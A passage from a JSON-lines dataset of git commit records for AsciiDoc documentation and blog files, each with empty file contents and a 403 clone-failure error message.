2016-10-05-15072015-Moteur.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-05-15072015-Moteur.adoc","new_file":"_posts\/2016-10-05-15072015-Moteur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce4c99299fb963cf37daf2c6eabed01aa2c8fe2","subject":"KUDU-654 Kudu style guide","message":"KUDU-654 Kudu style guide\n\nChange-Id: If891b9e1e09addb6f091ba0b6c07e6cd822d8bba\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7009\nTested-by: jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/style_guide.adoc","new_file":"docs\/style_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce9443d79cc541253930e7a7c917686cb401326c","subject":"Update 2018-01-30-The-post-Modern-Pilgrimage.adoc","message":"Update 2018-01-30-The-post-Modern-Pilgrimage.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-01-30-The-post-Modern-Pilgrimage.adoc","new_file":"_posts\/2018-01-30-The-post-Modern-Pilgrimage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21e69afe893789e76a6f9484a965b949d3b7926c","subject":"cookbook: removed duplicate links","message":"cookbook: removed duplicate links\n\nnew pointer is under Python API section instead of general\n\nSigned-off-by: imarom <4fa0e965a175bd1cef6459ed7c388bf7ff953a09@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_index.asciidoc","new_file":"doc\/trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8ae670840bb53cb3f925a57bdfcb21f41173cd2","subject":"Add early draft of CSS selector reference docs.","message":"Add early draft of CSS selector reference docs.\n","repos":"lzpfmh\/framework-2,lift\/framework,sortable\/framework,lift\/framework,lzpfmh\/framework-2,lzpfmh\/framework-2,listatree\/framework,lzpfmh\/framework-2,listatree\/framework,sortable\/framework,lift\/framework,listatree\/framework,lift\/framework,sortable\/framework,sortable\/framework,listatree\/framework","old_file":"docs\/css-selectors.adoc","new_file":"docs\/css-selectors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/listatree\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57bf1d0d861b9610cd76934056b772642364c432","subject":"tutorials: initial import of getting_started","message":"tutorials: initial import of getting_started\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/getting_started.adoc","new_file":"userguide\/tutorials\/getting_started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8705ac6df687343cc0ae6ae5b03f1858705bf79b","subject":"Update 2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","message":"Update 2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","repos":"twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io","old_file":"_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","new_file":"_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twentyTwo\/twentyTwo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebdc346df571271f3edf373330008941c65e1d00","subject":"Update 2015-07-22-Li-Europan-lingues.adoc","message":"Update 2015-07-22-Li-Europan-lingues.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Li-Europan-lingues.adoc","new_file":"_posts\/2015-07-22-Li-Europan-lingues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bed4b1b50802051a9094ab186174f26d54a364c","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8464bf7492f068af319866632dcc02b1db7cd774","subject":"Update 2017-10-03-new-blog-is-online.adoc","message":"Update 2017-10-03-new-blog-is-online.adoc","repos":"laibaogo\/hubpress.io,laibaogo\/hubpress.io,laibaogo\/hubpress.io,laibaogo\/hubpress.io","old_file":"_posts\/2017-10-03-new-blog-is-online.adoc","new_file":"_posts\/2017-10-03-new-blog-is-online.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laibaogo\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"580f9f741acd68144de58f6f2605fa84f86e1e4e","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ff1f526ee203e4efa0b2976dc3770796380fa61","subject":"Update 2015-06-08-My-title-4.adoc","message":"Update 2015-06-08-My-title-4.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-08-My-title-4.adoc","new_file":"_posts\/2015-06-08-My-title-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26a88cbe035dc83c046f54171dfce9e7b3383eb9","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/curl-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/curl-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b23cfb84b45da81450f88e2186e04123ad87c3b9","subject":"Update 2016-02-20-Comecando-com-Cordova.adoc","message":"Update 2016-02-20-Comecando-com-Cordova.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c5ad96cc8035ee26508880ea6bd8984dd7faa5","subject":"Update manual about C-style #line and #include directive.","message":"Update manual about C-style #line and #include directive.\n","repos":"dneto0\/shaderc,antiagainst\/shaderc,Qining\/shaderc,davidlee80\/shaderc,drewet\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,Samana\/shaderc,fuchsia-mirror\/third_party-shaderc,AWoloszyn\/shaderc,antiagainst\/shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,AWoloszyn\/shaderc,Samana\/shaderc,dneto0\/shaderc,davidlee80\/shaderc,Samana\/shaderc,drewet\/shaderc,antiagainst\/shaderc,Qining\/shaderc,davidlee80\/shaderc,AWoloszyn\/shaderc,Qining\/shaderc,drewet\/shaderc,dneto0\/shaderc","old_file":"glslc\/README.asciidoc","new_file":"glslc\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Qining\/shaderc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3b82a3425e55261a39900f1f5faa3f9a8569a6a","subject":"create post I Bought The Cheapest Smartphone on Amazon...","message":"create post I Bought The Cheapest Smartphone on Amazon...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-I-Bought-The-Cheapest-Smartphone-on-Amazon....adoc","new_file":"_posts\/2018-02-26-I-Bought-The-Cheapest-Smartphone-on-Amazon....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4dc3d9dd3c8112fec54301b0f5ffecef87189c1","subject":"Add lab08 task","message":"Add lab08 task","repos":"slbedu\/javase8-2016","old_file":"lab08\/README.adoc","new_file":"lab08\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"736f0b8d247e766c39e91ed302682fd1770348a3","subject":"Create README.adoc","message":"Create README.adoc","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"helm-charts\/README.adoc","new_file":"helm-charts\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89fc2467afd66af4016a3ae736b39786150297a5","subject":"0.10.0.Beta2 release announcement","message":"0.10.0.Beta2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-06-28-debezium-0-10-0-beta2-released.adoc","new_file":"blog\/2019-06-28-debezium-0-10-0-beta2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d151466234d7e36a1fb6cdda9ec4def7fb95137","subject":"y2b create post NYC Trip - Behind the Scenes #1","message":"y2b create post NYC Trip - Behind the Scenes #1","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-20-NYC-Trip--Behind-the-Scenes-1.adoc","new_file":"_posts\/2015-04-20-NYC-Trip--Behind-the-Scenes-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe77cab114f95f01320873a2472a3d3b1db91a43","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50206c28f70eacc16f2903e90211a567c60638b6","subject":"Update 2017-09-05-Getting-Started-with-Hubpress.adoc","message":"Update 2017-09-05-Getting-Started-with-Hubpress.adoc","repos":"alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io","old_file":"_posts\/2017-09-05-Getting-Started-with-Hubpress.adoc","new_file":"_posts\/2017-09-05-Getting-Started-with-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alimasyhur\/alimasyhur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f75b46d6047046e48bf02acda1ee018c7134afa5","subject":"Add note about CLISP and Hunchentoot","message":"Add note about CLISP and Hunchentoot\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ee3394e484692e4da09d4c8e3a6034b23edd6318","subject":"CL - HTML template lib","message":"CL - HTML template lib\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c9d6d689a19ed03a348d521b2d63a2dfad92d8f7","subject":"dump from lecture on routing and \"not covering multicasting\"-multicasting","message":"dump from lecture on routing and \"not covering multicasting\"-multicasting\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture12_20171115.adoc","new_file":"lecture12_20171115.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6aaec85008c1a93b3745087746376e76accfa39","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ac69f5efc85ff918574425b46c62e3e1f6ef879","subject":"y2b create post New Monster Headphones CES 2012","message":"y2b create post New Monster Headphones CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-New-Monster-Headphones-CES-2012.adoc","new_file":"_posts\/2012-01-12-New-Monster-Headphones-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"186df4f5eea169cf04ba5a9578d2c9082859c293","subject":"Update 2016-07-15-Update-Whats-New-in-Version-060.adoc","message":"Update 2016-07-15-Update-Whats-New-in-Version-060.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2016-07-15-Update-Whats-New-in-Version-060.adoc","new_file":"_posts\/2016-07-15-Update-Whats-New-in-Version-060.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97e2e1b3f5aacb4540575bea76c48a2dc291443a","subject":"Document version","message":"Document version\n","repos":"microserviceux\/muon-node,microserviceux\/muon-node","old_file":"doc\/version.adoc","new_file":"doc\/version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/microserviceux\/muon-node.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eaf1f0c6055c6ac85a7456b09b40746c0eceaecb","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61dd5ae20e0ec585bb247b605f4d035531f55fe9","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0517ac6b8c5ad66f84db35476592aacc0bb5ff2","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cea03b0e4a9b9055f1e06e786f3a374ecd7e1f2","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/ukraine_nov_2017.adoc","new_file":"content\/writings\/ukraine_nov_2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"889764e89593fa9a9e9ba9f8fa52f80e6e8c6a94","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca69297d83cab04d12546e4e0f5e07442ad20839","subject":"y2b create post The Unboxing Time Machine - NES 1985","message":"y2b create post The Unboxing Time Machine - NES 1985","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-01-The-Unboxing-Time-Machine--NES-1985.adoc","new_file":"_posts\/2016-12-01-The-Unboxing-Time-Machine--NES-1985.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a41c8f68511ac5c6bd38a195627df12a0bed14b","subject":"y2b create post PICK YOUR PRIZE EPIC WINNER!","message":"y2b create post PICK YOUR PRIZE EPIC WINNER!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-22-PICK-YOUR-PRIZE-EPIC-WINNER.adoc","new_file":"_posts\/2011-09-22-PICK-YOUR-PRIZE-EPIC-WINNER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"752cbc1f29716346ccafba16b80b256d2ef37ce4","subject":"Update 2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e3ecefe8bfc5553413c2e6308c161f5bdf1fc0a","subject":"Update 2016-12-01-There-was-a-keynote-lecture.adoc","message":"Update 2016-12-01-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-01-There-was-a-keynote-lecture.adoc","new_file":"_posts\/2016-12-01-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a3ed78c06f3b0b18c61013545119432a3500c81","subject":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","message":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b2c6d09c804e75d8e14f8b7cd96810bc6e70477","subject":"Update 2018-11-11-Go-2.adoc","message":"Update 2018-11-11-Go-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Go-2.adoc","new_file":"_posts\/2018-11-11-Go-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeab70c63c30cf54933fda68a25470b31329acdd","subject":"Update 2019-11-23-oyl3.adoc","message":"Update 2019-11-23-oyl3.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-23-oyl3.adoc","new_file":"_posts\/2019-11-23-oyl3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a1f88fbca323ce2864781948e5b17a5ba0ee83b","subject":"y2b create post Giant Mystery Unboxing...","message":"y2b create post Giant Mystery Unboxing...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-15-Giant-Mystery-Unboxing.adoc","new_file":"_posts\/2016-12-15-Giant-Mystery-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"968497ad97faad6b4fb7b89ccdfa42109e85018f","subject":"added readme","message":"added readme\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee58617c0cfd56340bbd6e4751ae82b9e441ca30","subject":"[docs] Added steps to update HMS after migrating to multiple Kudu masters","message":"[docs] Added steps to update HMS after migrating to multiple Kudu masters\n\nChange-Id: Iab3999c9e581ed3591b220c08491cdae867c91db\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8948\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\nTested-by: Jean-Daniel Cryans 